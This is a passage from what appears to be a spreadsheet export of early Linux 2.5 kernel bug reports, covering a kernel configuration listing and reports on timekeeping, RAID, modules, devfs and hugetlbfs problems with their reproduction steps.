set # CONFIG_IEEE1394_VERBOSEDEBUG is not set # # I2O device support # # CONFIG_I2O is not set # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_FILTER=y CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set CONFIG_INET_ECN=y # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_XFRM_USER is not set # # IP: Netfilter Configuration # # CONFIG_IP_NF_CONNTRACK is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=m # CONFIG_IP_NF_MATCH_LIMIT is not set CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m # CONFIG_IP_NF_MATCH_MARK is not set # CONFIG_IP_NF_MATCH_MULTIPORT is not set # CONFIG_IP_NF_MATCH_TOS is not set # CONFIG_IP_NF_MATCH_ECN is not set # CONFIG_IP_NF_MATCH_DSCP is not set # CONFIG_IP_NF_MATCH_AH_ESP is not set # CONFIG_IP_NF_MATCH_LENGTH is not set # CONFIG_IP_NF_MATCH_TTL is not set # CONFIG_IP_NF_MATCH_TCPMSS is not set # CONFIG_IP_NF_MATCH_UNCLEAN is not set # CONFIG_IP_NF_MATCH_OWNER is not set CONFIG_IP_NF_FILTER=m # CONFIG_IP_NF_TARGET_REJECT is not set # CONFIG_IP_NF_TARGET_MIRROR is not set # CONFIG_IP_NF_MANGLE is not set # CONFIG_IP_NF_TARGET_LOG is not set # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_IP_NF_TARGET_TCPMSS is not set # CONFIG_IP_NF_ARPTABLES is not set # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set # CONFIG_IPV6 is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # # Network device support # CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=y # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_NET_PCI is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices # # CONFIG_TR is not set # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=m # CONFIG_INPUT_MOUSEDEV_PSAUX is not set CONFIG_INPUT_MOUSEDEV_SCREEN_X=1600 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=1024 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=m # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y # CONFIG_SERIO is not set # # Input Device Drivers # # CONFIG_INPUT_KEYBOARD is not set # CONFIG_INPUT_MOUSE is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=m # CONFIG_TIPAR is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_ALGOBIT=m # CONFIG_I2C_PHILIPSPAR is not set # CONFIG_I2C_ELV is not set # CONFIG_I2C_VELLEMAN is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_ALGOPCF is not set CONFIG_I2C_CHARDEV=m CONFIG_I2C_PROC=m # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_INTEL_RNG is not set # CONFIG_AMD_RNG is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=m # CONFIG_AGP_INTEL is not set # CONFIG_AGP_I810 is not set # CONFIG_AGP_VIA is not set CONFIG_AGP_AMD=y # CONFIG_AGP_SIS is not set # CONFIG_AGP_ALI is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_AMD_8151 is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_MGA is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # # Multimedia devices # CONFIG_VIDEO_DEV=m # # Video For Linux # CONFIG_VIDEO_PROC_FS=y # # Video Adapters # CONFIG_VIDEO_BT848=m # CONFIG_VIDEO_PMS is not set # CONFIG_VIDEO_BWQCAM is not set # CONFIG_VIDEO_CQCAM is not set # CONFIG_VIDEO_W9966 is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_ZR36120 is not set # CONFIG_VIDEO_SAA7134 is not set # # Radio Adapters # # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # File systems # # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y CONFIG_REISERFS_FS=m # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y # CONFIG_EXT3_FS_POSIX_ACL is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set # CONFIG_FAT_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set CONFIG_TMPFS=y CONFIG_RAMFS=y CONFIG_ISO9660_FS=m CONFIG_JOLIET=y # CONFIG_ZISOFS is not set # CONFIG_JFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_VXFS_FS is not set CONFIG_NTFS_FS=m # CONFIG_NTFS_DEBUG is not set # CONFIG_NTFS_RW is not set # CONFIG_HPFS_FS is not set CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y CONFIG_DEVFS_MOUNT=y # CONFIG_DEVFS_DEBUG is not set # CONFIG_DEVPTS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_SYSV_FS is not set # CONFIG_UDF_FS is not set # CONFIG_UFS_FS is not set # CONFIG_XFS_FS is not set # # Network File Systems # # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set CONFIG_NFS_FS=y CONFIG_NFS_V3=y # CONFIG_NFS_V4 is not set CONFIG_NFSD=y CONFIG_NFSD_V3=y # CONFIG_NFSD_V4 is not set # CONFIG_NFSD_TCP is not set CONFIG_SUNRPC=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y # CONFIG_CIFS is not set CONFIG_SMB_FS=m # CONFIG_SMB_NLS_DEFAULT is not set # CONFIG_NCP_FS is not set # CONFIG_AFS_FS is not set CONFIG_FS_MBCACHE=y # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Console drivers # CONFIG_VGA_CONSOLE=y CONFIG_VIDEO_SELECT=y # CONFIG_MDA_CONSOLE is not set # # Frame-buffer support # CONFIG_FB=y CONFIG_DUMMY_CONSOLE=y # CONFIG_FB_CLGEN is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y # CONFIG_FB_HGA is not set CONFIG_FB_RIVA=m # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_VIRTUAL is not set CONFIG_FBCON_ADVANCED=y # CONFIG_FBCON_MFB is not set # CONFIG_FBCON_CFB2 is not set # CONFIG_FBCON_CFB4 is not set CONFIG_FBCON_CFB8=y CONFIG_FBCON_CFB16=m CONFIG_FBCON_CFB24=m CONFIG_FBCON_CFB32=m # CONFIG_FBCON_ACCEL is not set # CONFIG_FBCON_AFB is not set # CONFIG_FBCON_ILBM is not set # CONFIG_FBCON_IPLAN2P2 is not set # CONFIG_FBCON_IPLAN2P4 is not set # CONFIG_FBCON_IPLAN2P8 is not set # CONFIG_FBCON_VGA_PLANES is not set # CONFIG_FBCON_HGA is not set # CONFIG_FBCON_FONTWIDTH8_ONLY is not set # CONFIG_FONT_SUN8x16 is not set # CONFIG_FONT_SUN12x22 is not set CONFIG_FBCON_FONTS=y CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # CONFIG_FONT_6x11 is not set # CONFIG_FONT_PEARL_8x8 is not set # CONFIG_FONT_ACORN_8x8 is not set # CONFIG_FONT_MINI_4x6 is not set # # Sound # CONFIG_SOUND=m # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # Advanced Linux Sound Architecture # # CONFIG_SND is not set # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_LONG_TIMEOUT is not set # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set # CONFIG_USB_OHCI_HCD is not set # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # CONFIG_USB_STORAGE is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set # CONFIG_USB_HIDDEV is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # CONFIG_USB_VICAM is not set # CONFIG_USB_DSBR is not set # CONFIG_USB_IBMCAM is not set # CONFIG_USB_KONICAWC is not set # CONFIG_USB_OV511 is not set # CONFIG_USB_PWC is not set # CONFIG_USB_SE401 is not set # CONFIG_USB_STV680 is not set # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_CDCETHER is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set # # Security options # CONFIG_SECURITY_CAPABILITIES=y # # Cryptographic options # # CONFIG_CRYPTO is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_X86_BIOS_REBOOT=y</t>
  </si>
  <si>
    <t>file remain locked after sapdb process exist.</t>
  </si>
  <si>
    <t>2002-11-18 15:22 UTC</t>
  </si>
  <si>
    <t>Mingming Cao</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version:2.5.47 Distribution: Hardware Environment:Intel PIII 700MHz, 1G L1, 8 CPUs Software Environment:RedHat 7.2, glibc-2.2.4-13,sapdb 7.3.0.25-1, OSDL's dbt1 test suite Problem Description: sapdb failed to unlock the raw device it used after it quits the database. So next time it failed to re-load the sap database since it tries to re-lock the raw devices. This problem does not exist on 2.4 kernel. Steps to reproduce: Modify dbt1/scripts/sapdb/create_db.sh(if necessary), put the data on some raw devices(there is not problem with filesystem). Then reboot the machine(SMP box) and do the following cd dbt1/scripts/sapdb ./create_db.sh ./drop_db.sh ./create_db.sh check the error messages under /var/opt/sapdb/indep_data/wrk/DBT1/knldiag.err</t>
  </si>
  <si>
    <t>LTP - gettimeofday02 fails (time is going backwards)</t>
  </si>
  <si>
    <t>gettimeofday</t>
  </si>
  <si>
    <t>2002-11-19 06:45 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:31 UTC</t>
  </si>
  <si>
    <t>john stultz</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.47 (and many other 2.5 kernels, not specific to this version) Distribution: SuSE 8.0 Hardware Environment: 2-way PIII-550 Software Environment: Problem Description: I've been getting a somewhat random error in a few of the recent 2.5 kernels with SMP machines. I noticed this on a 2.5.47 bk pull, but I was also able to reproduce it on 2.5.46. I haven't tried any earlier kernels yet. The LTP gettimeofday02 test sometimes fails with this message: gettimeofday02 0 INFO : checking if gettimeofday is monotonous, takes 30s gettimeofday02 1 FAIL : Time is going backwards (old 1037138184.846333 vs new 1037138184.843346! I have not been able to reproduce this on a single processor machine though. Basically, all the test does is: gettimeofday(&amp;tv1, NULL); while(!done) { gettimeofday(&amp;tv2, NULL); FAIL if tv2 &lt; tv1 tv1 = tv2; } Steps to reproduce: Run gettimeofday02 from LTP on a SMP machine. It happens at random and may take several tries.</t>
  </si>
  <si>
    <t>Read from a raid 0 array failed.</t>
  </si>
  <si>
    <t>MD</t>
  </si>
  <si>
    <t>2002-11-19 12:57 UTC</t>
  </si>
  <si>
    <t>F</t>
  </si>
  <si>
    <t>2002-12-01 08:06 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 ============================ This also append with 2.5.47-ac5, 2.5.47-ac6. Distribution: ============= RedHat 8.0 Hardware Environment: ===================== $ lspci 00:00.0 Host bridge: VIA Technologies, Inc. VT8367 [KT266] 00:01.0 PCI bridge: VIA Technologies, Inc. VT8367 [KT333 AGP] 00:05.0 Unknown mass storage controller: Triones Technologies, Inc. HPT366/368/370/370A/372 (rev 03) 00:06.0 Multimedia controller: Sigma Designs, Inc. REALmagic Hollywood Plus DVD Decoder (rev 02) 00:07.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 06) 00:08.0 ATM network controller: SGS Thomson Microelectronics: Unknown device 0500 (rev 10) 00:09.0 Multimedia video controller: Brooktree Corporation Bt848 Video Capture (rev 12) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8233 PCI to ISA Bridge 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586B PIPC Bus Master IDE (rev 06) 01:00.0 VGA compatible controller: ATI Technologies Inc 3D Rage IIC AGP (rev 7a) $ cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 6 model name : AMD Athlon(tm) XP 1600+ stepping : 2 cpu MHz : 1399.763 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 2791.83 disks : HPT370: chipset revision 3 HPT370: not 100%% native mode: will probe irqs later HPT37X: using 33MHz PCI clock ide2: BM-DMA at 0xdc00-0xdc07, BIOS settings: hde:pio, hdf:pio ide3: BM-DMA at 0xdc08-0xdc0f, BIOS settings: hdg:DMA, hdh:pio VP_IDE: IDE controller at PCI slot 00:11.1 VP_IDE: chipset revision 6 VP_IDE: not 100%% native mode: will probe irqs later ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: VIA vt8233 (rev 00) IDE UDMA100 controller on pci00:11.1 ide0: BM-DMA at 0xfc00-0xfc07, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xfc08-0xfc0f, BIOS settings: hdc:DMA, hdd:pio hda: Maxtor 90340D2, ATA DISK drive hdc: Maxtor 90340D2, ATA DISK drive hde: SAMSUNG CD-R/RW SW-240B, ATAPI CD/DVD-ROM drive hdf: CREATIVE DVD-ROM DVD1243E, ATAPI CD/DVD-ROM drive hdg: WDC WD205AA-00BAA0, ATA DISK drive Software Environment: ===================== $ bash /usr/src/linux-2.5.48/scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux localhost.localdomain 2.5.48 #1 Tue Nov 19 17:27:42 CET 2002 i686 athlon i386 GNU/Linux Gnu C 3.2 Gnu make 3.79.1 util-linux 2.11r mount 2.11r modutils directory e2fsprogs 1.27 Linux C Library 2.2.93 Dynamic linker (ldd) 2.2.93 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0.12 Modules Loaded cdrom Problem Description: ==================== Read from a raid 0 array may failed. This append with ext3 and ext2. This also append if raid array and filesystem is created under linux 2.4. Steps to reproduce: =================== # cat /etc/raidtab raiddev /dev/md0 raid-level 0 nr-raid-disks 2 chunk-size 32k persistent-superblock 1 nr-spare-disks 0 device /dev/hda3 raid-disk 0 device /dev/hdc3 raid-disk 1 # mkraid --configfile /etc/raidtab --really-force /dev/md0 DESTROYING the contents of /dev/md0 in 5 seconds, Ctrl-C if unsure! handling MD device /dev/md0 analyzing super-block disk 0: /dev/hda3, 3163104kB, raid superblock at 3163008kB disk 1: /dev/hdc3, 3163104kB, raid superblock at 3163008kB # mke2fs -j /dev/md0 [...] # mount -t ext3 /dev/md0 /mnt/md0 ## copie of a big tree # cp -pr /usr /mnt/md0 ## read # cp -pvr /mnt/md0/usr /tmp `/mnt/md0/usr/' -&gt; `/tmp/usr' `/mnt/md0/usr/bin' -&gt; `/tmp/usr/bin' `/mnt/md0/usr/bin/consolehelper' -&gt; `/tmp/usr/bin/consolehelper' [kernel panic] kernel BUG at drivers/block/ll_rw_blk.c:1897! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c01937b5&gt;] Not tainted EFLAGS: 00010246 eax: 00000000 ebx: 00000000 ecx: ce6d9cc4 edx: 00000000 esi: ce6d9cc4 edi: 00000001 ebp: 00000001 esp: c82f7be8 ds: 0068 es: 0068 ss: 0068 Process cp (pid: 821, threadinfo=c82f6000 task=cc190cc0) Stack: 00000000 c01500c3 00000000 ce6d9cc4 00001000 c015038b 00000000 ce6d9cc4 c13908ac 00000001 00000002 00000001 0000000c c307b1c4 00000010 c1e151b4 c307b308 c136d804 000701ff 00000000 00000000 c13908ac c82f7cb4 c307b388 Call Trace: [&lt;c01500c3&gt;] [&lt;c015038b&gt;] [&lt;c0124d5e&gt;] [&lt;c0150478&gt;] [&lt;c0160d00&gt;] [&lt;c013888a&gt;] [&lt;c016b0b8&gt;] [&lt;c0139a23&gt;] [&lt;c016b6fe&gt;] [&lt;c013186d&gt;] [&lt;c0160d00&gt;] [&lt;c0163440&gt;] [&lt;c012cc34&gt;] [&lt;c012ccba&gt;] [&lt;c0131a16&gt;] [&lt;c0131b25&gt;] [&lt;c01253b2&gt;] [&lt;c01256c0&gt;] [&lt;c0125972&gt;] [&lt;c01256c0&gt;] [&lt;c01259d8&gt;] [&lt;c013743e&gt;] [&lt;c0165ffd&gt;] [&lt;c013752b&gt;] [&lt;c0137788&gt;] [&lt;c01089fb&gt;] Code: 0f 0b 69 07 cf b0 20 c0 8b 41 24 85 c0 75 08 0f 0b 6a 07 cf Under 2.5.47-ac6 : freeze.</t>
  </si>
  <si>
    <t>MIPS fails to make menuconfig - arch/mips/Kconfig screwed</t>
  </si>
  <si>
    <t>MIPS</t>
  </si>
  <si>
    <t>Mips32 Linux</t>
  </si>
  <si>
    <t>2002-11-19 15:15 UTC</t>
  </si>
  <si>
    <t>2002-12-09 20:14 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution: standard ftp.kernel.org Hardware Environment: SG Indy Software Environment: Debian/Sid Problem Description: Fails to make menuconfig with the error: ./scripts/kconfig/mconf arch/mips/Kconfig arch/mips/Kconfig:916: parse error, unexpected T_STRING, expecting T_EOL arch/mips/Kconfig:916:warning: multi-line strings not supported arch/mips/Kconfig:916: syntax error arch/mips/Kconfig:917: unexpected 'endif' statement Line 916 of arch/mips/Kconfig reads: if !DECSTATION" &amp;&amp; !SGI_IP22 source "drivers/message/i2o/Kconfig" endif Steps to reproduce: make menucofnig</t>
  </si>
  <si>
    <t>gettimeofday cripples system running with notsc</t>
  </si>
  <si>
    <t>2002-11-19 17:06 UTC</t>
  </si>
  <si>
    <t>Michael Hohnbaum</t>
  </si>
  <si>
    <t>2003-04-01 10:40 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version:2.5.47 Distribution: Hardware Environment:numaq 4 nodes (16 procs) Software Environment: Problem Description: Running a large application that issues many gettimeofday() system calls on a kernel running with notsc, results in time slowing way down. I've seen the system time advance only three minutes over a 30 minute period. Steps to reproduce: Run multiple instances of the following program on an x86 based system booted with notsc. #include &lt;sys/time.h&gt; main() { struct timeval tv; struct timezone tz; while (1) if (gettimeofday(&amp;tv, &amp;tz)) return; }</t>
  </si>
  <si>
    <t>Current Linus Tree, Modules just don't work, they aren't being recognized</t>
  </si>
  <si>
    <t>Modules</t>
  </si>
  <si>
    <t>2002-11-19 22:36 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:33 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: Bitkeeper Linus' Tree Distribution: Gentoo Hardware Environment: Pentium 3 Software Environment: gcc-2.95.3 Problem Description: I included all the module options and after booting the kernel, update-modules gives me this: bash # update-modules depmod: QM_MODULES: Function not implemented and modprobe -l gives me this: bash # modprobe -l modprobe: Can't open dependencies file /lib/modules/2.5.48/modules.dep (No such file or directory) Steps to reproduce: Compile with CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_KMOD=y and try update-modules or modprobe -l</t>
  </si>
  <si>
    <t>Arnaldo Carvalho de Melo</t>
  </si>
  <si>
    <t>Current bk Linux-2.5, VFS Kernel Panic from Devfs + NO UNIX98_PTYS</t>
  </si>
  <si>
    <t>2002-11-20 15:32 UTC</t>
  </si>
  <si>
    <t>2003-03-08 17:33 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version:Current Linus' Bitkeeper tree Distribution: Gentoo Hardware Environment: Dell Dimension Pentium 3 Software Environment: gcc-2.95.3 Problem Description: Steps to reproduce: If the kernel is configured with: CONFIG_UNIX98_PTYS = N CONFIG_DEVFS_FS = Y CONFIG_DEVFS_MOUNT = Y at boot a kernel panic occurs with this msg: VFS: Cannot open root device "hda2" or 03:02 Please append a correct "root=" boot option Kernel panic: VFS: Unable to mount root fs on 03:02 But if I compile with CONFIG_UNIX98_PTYS = Y CONFIG_DEVFS_FS = Y CONFIG_DEVFS_MOUNT = Y the kernel boots.</t>
  </si>
  <si>
    <t>hugetlbfs does not align pages</t>
  </si>
  <si>
    <t>2002-11-21 09:23 UTC</t>
  </si>
  <si>
    <t>Dennis Haney</t>
  </si>
  <si>
    <t>2003-03-17 09:43 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution:vanilla Hardware Environment:NA Software Environment:NA Problem Description: The mmap of a file in the hugetlbfs requires that you give a hugepage aligned address, if you just give a NULL stating automatic allocate an appropiate address the page is only aligned to 4k which makes the mmap fail in 99.999% of all calls. Steps to reproduce: void* mem = mmap(NULL, 128*1024*1024, PROT_READ| PROT_WRITE, MAP_PRIVATE, fd, 0)</t>
  </si>
  <si>
    <t>Kernel modules won't load</t>
  </si>
  <si>
    <t>2002-11-23 12:37 UTC</t>
  </si>
  <si>
    <t>Stef van der Made</t>
  </si>
  <si>
    <t>2003-02-19 14:09 UTC</t>
  </si>
  <si>
    <t>all mounts oops</t>
  </si>
  <si>
    <t>Alpha Linux</t>
  </si>
  <si>
    <t>2002-11-23 12:55 UTC</t>
  </si>
  <si>
    <t>2002-12-16 09:43 UTC</t>
  </si>
  <si>
